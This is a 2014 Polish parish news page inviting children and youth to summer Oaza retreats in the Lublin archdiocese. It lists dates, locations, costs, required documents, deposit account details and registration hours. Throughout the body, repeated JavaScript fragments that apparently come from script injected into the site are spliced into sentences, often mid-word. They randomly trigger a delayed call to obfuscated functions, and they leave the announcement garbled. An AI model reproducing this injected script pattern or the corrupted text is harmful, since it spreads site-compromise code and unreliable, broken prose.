wstazka
Kościół Świętego Ducha
Strona główna -> Aktualności
Wpisał:Katarzyna Data: 15-05-2014
ikona

Zaproszenie na rekolekcje oazowe

andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

Ruch Światło-Życie Archidiecezji Lubelskiej serdecznie zaprasza do udziału
w rekolekcjach wakacyjnych. Przygoandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towaliśmy miejsca dla dzieci w terminie
28.06-14.07, w Nadrybiu, Skrobowie i Bukowie Wielkiej, dla młodzieży
gimnazjalnej w terminie 15.07-31.07, w Sadurkach i Bukowie Wielkiej. Po
III kl. gimnazjum, młodzież szkół średnich i studentów, zapraszamy
młodzież na rekolekcje I sandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}topnia do Łańcuchowa (chłopcy) i Ostrówka
(dziewczęta). Dla tych osób, jako przygoandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towanie organizujemy rekolekcje
ewangelizacyjne w Chełmie w terminie 23-25 maja.
Kolejne sandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}topnie i turnusy dla osób formujących się przy parafii są
zamieszczone na stronie interneandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towej andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}www.lublin.oaza.pl.
Na stronie znajdują się także informacje o oazach studenckich i oazach
dorosłych oraz oazach rodzin.

Koszt większości rekolekcji andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to 550 zł za 15 dni rekolekcji.

Wszystkie informacje potrzebne przy zgłoszeniu dzieci i młodzieży na
rekolekcje wakacyjne – OŻK 2014 znajdują się pod linkami:

andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}http://www.lublin.oaza.pl/index.php/dzieci-boze
andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}http://www.lublin.oaza.pl/index.php/mlodziez

Od 5 maja do 2 czerwca 2014 roku będą trwały zapisy na rekolekcje.
Wymagane dokumenty andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to:
– Umowa o organizację oazy z rodzicami, wydrukowaną ze strony interneandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towej
w dwóch egz. i podpisaną przez obojga rodziców/prawnych opiekunów,
– karta kwalifikacyjna uczestnika wraz z zaliczką w wysokości 200 zł
(wpłat można dokonywać na konandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to Sandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towarzyszenia DIAKONIA Ruchu
Światło-Życie Archidiecezji Lubelskiej: Bank Pekao S.A, rachunek: 64 1240
1503 1111 0010 5002 6776).

Potwierdzenie zgłoszeń – Umowy zostaną przekazane na Diecezjalnej Oazie
Matce – Rozesłaniu oaz wakacyjnych w Wąwolnicy w dniu 21 czerwca 2014
roku. Jest możliwość otrzymania zaświadczenia o dofinansowanie oaz do
zakładu pracy rodziców, podczas dyżurów.

Zgłoszenia przyjmujemy w Centrum Ruchu Światło-Życie przy Archikatedrze:
– we wandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}torek, godz. 14.00-18.00,
– środa, godz. 16.00-18.30.

Z pamięcią w modlitwie
Ks. Piotr Drozd

 

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video